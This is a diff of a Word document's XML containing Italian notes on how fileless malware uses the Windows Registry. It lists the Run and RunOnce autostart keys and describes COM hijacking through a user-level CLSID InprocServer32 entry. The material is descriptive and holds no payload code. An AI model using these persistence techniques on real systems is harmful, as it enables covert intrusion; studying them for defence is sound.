--- a/Cosa scrivono i malware fileless sui registri.docx
+++ b/Cosa scrivono i malware fileless sui registri.docx
@@ -14,7 +14,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Cosa scrivono i malware fileless sui registri</w:t>
+        <w:t>I fileless malware e i registri di sistema</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -35,7 +35,13 @@
         <w:t>fileless malware</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> sfruttano principamente queste chiavi d</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">possono sfruttare </w:t>
+      </w:r>
+      <w:r>
+        <w:t>queste chiavi d</w:t>
       </w:r>
       <w:r>
         <w:t>el registro di</w:t>
@@ -44,28 +50,51 @@
         <w:t xml:space="preserve"> sistema</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">, le prime due sono essenziali per ottenere la </w:t>
-      </w:r>
-      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>per portare a compimento i suoi scopi:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>persistenza</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> (mantenere attivo il malware al riavvio)</w:t>
-      </w:r>
-      <w:r>
-        <w:t>:</w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Persistenza</w:t>
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+      </w:pPr>
       <w:r>
         <w:t xml:space="preserve">- </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">HKCU\Software\Microsoft\Windows\CurrentVersion\Run (Esecuzione per l'utente corrente, </w:t>
+        <w:t>HKCU\Software\Microsoft\Windows\CurrentVersion\Run (</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">secuzione per l'utente corrente, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -79,71 +108,199 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+      </w:pPr>
       <w:r>
         <w:t xml:space="preserve">- </w:t>
       </w:r>
       <w:r>
-        <w:t>HKLM\Software\Microsoft\Windows\CurrentVersion\Run (Esecuzione per tutti gli utenti, richiede privilegi admin).</w:t>
+        <w:t>HKLM\Software\Microsoft\Windows\CurrentVersion\Run (</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">secuzione per tutti gli utenti, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>richiede</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> privilegi admin).</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>HKLM\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Software\Microsoft\Windows\CurrentVersion</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>RunOnce</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>- HKLM\ Software\Microsoft\Windows\CurrentVersion\RunOnce (esegue e poi cancella la chiave)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
         <w:rPr>
-          <w:lang w:val="en-US"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>COM Hijacking (La tecnica del CLSID)</w:t>
+      </w:r>
     </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Ogni componente software in Windows ha un identificatore unico chiamato </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>CLSID</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (un codice tipo {12345678-ABCD-...}). Questi codici sono mappati nel Registro.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Il meccanismo di attacco:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Normalmente, Windows cerca i componenti prima in HKEY_LOCAL_MACHINE (HKLM - a livello di sistema). Tuttavia, se un utente definisce lo stesso CLSID in HKEY_CURRENT_USER (HKCU), quest'ultimo ha la precedenza.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Cosa fa il malware:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Identifica un CLSID legittimo</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> che viene caricato spesso (es. quello che gestisce le icone della barra delle applicazioni o i menu di Explorer).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Crea la chiave in HKCU</w:t>
+      </w:r>
+      <w:r>
+        <w:t>: Non serve essere amministratori per scrivere qui!</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Percorso: HKCU\Software\Classes\CLSID\{GUID_LEGITTIMO}\InprocServer32</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Sostituisce il valore</w:t>
+      </w:r>
+      <w:r>
+        <w:t>: Invece del percorso della DLL originale (es. C:\Windows\System32\shell32.dll), inserisce un comando malevolo o il percorso di una propria DLL posizionata altrove.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Effetto:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Ogni volta che Windows ha bisogno di quel componente (spesso ogni pochi secondi), esegue il codice del malware. Essendo "fileless", il malware potrebbe puntare a uno script PowerShell memorizzato in un'altra chiave di registro.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1134" w:bottom="1134" w:left="1134" w:header="708" w:footer="708" w:gutter="0"/>
@@ -152,6 +309,312 @@
     </w:sectPr>
   </w:body>
 </w:document>
+</file>
+
+<file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="24796B7F"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="0C2A0FA8"/>
+    <w:lvl w:ilvl="0" w:tplc="04100001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1068" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1788" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2508" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3228" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3948" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4668" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5388" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6108" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6828" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="3E2C586D"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="445E341A"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="5ECB57B5"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="E3DAB198"/>
+    <w:lvl w:ilvl="0" w:tplc="0410000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04100019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0410001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0410000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04100019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0410001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0410000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04100019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0410001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:num w:numId="1" w16cid:durableId="405763203">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="2" w16cid:durableId="62338613">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="3" w16cid:durableId="993728766">
+    <w:abstractNumId w:val="0"/>
+  </w:num>
+</w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>

--- a/Cosa scrivono i malware fileless sui registri.docx
+++ b/Cosa scrivono i malware fileless sui registri.docx
@@ -7,19 +7,29 @@
         <w:rPr>
           <w:b/>
           <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
         </w:rPr>
         <w:t>I fileless malware e i registri di sistema</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Il Registro di Sistema di Windows è un database gerarchico che memorizza le impostazioni di configurazione.</w:t>
+        <w:t>Il Registro di Sistema di Windows è un database gerarchico che memorizza le impostazioni di configurazione</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> del sistema operativo e dei programmi installati</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -44,263 +54,2328 @@
         <w:t>queste chiavi d</w:t>
       </w:r>
       <w:r>
-        <w:t>el registro di</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> sistema</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>per portare a compimento i suoi scopi:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:t xml:space="preserve">el registro </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">per portare a compimento i </w:t>
+      </w:r>
+      <w:r>
+        <w:t>loro</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> scop</w:t>
+      </w:r>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. Le HKEY non sono tutte uguali, difatti </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ne </w:t>
+      </w:r>
+      <w:r>
+        <w:t>esistono</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> di diverse categorie</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>1. Chiavi di Esecuzione Automatica Standard (Autostart)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Queste sono le più comuni, utilizzate per garantire che il comando (solitamente uno script </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> o MSHTA) venga eseguito a ogni avvio o login.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>1. HKEY_CURRENT_USE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>R\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Software\Microsoft\Windows\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>CurrentVersion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>\Run</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="708"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Questa è la chiave di persistenza più utilizzata in assoluto per attacchi mirati all'utente.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="11"/>
         </w:numPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Persistenza</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:tabs>
+          <w:tab w:val="clear" w:pos="720"/>
+          <w:tab w:val="num" w:pos="1428"/>
+        </w:tabs>
+        <w:ind w:left="1428"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Spiegazione:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> I comandi elencati qui vengono eseguiti ogni volta che l'utente specifico effettua l'accesso (logon).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
+          <w:numId w:val="11"/>
         </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:r>
-        <w:t>HKCU\Software\Microsoft\Windows\CurrentVersion\Run (</w:t>
-      </w:r>
-      <w:r>
-        <w:t>e</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">secuzione per l'utente corrente, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">non </w:t>
-      </w:r>
-      <w:r>
-        <w:t>richiede diritti di amministratore).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:tabs>
+          <w:tab w:val="clear" w:pos="720"/>
+          <w:tab w:val="num" w:pos="1428"/>
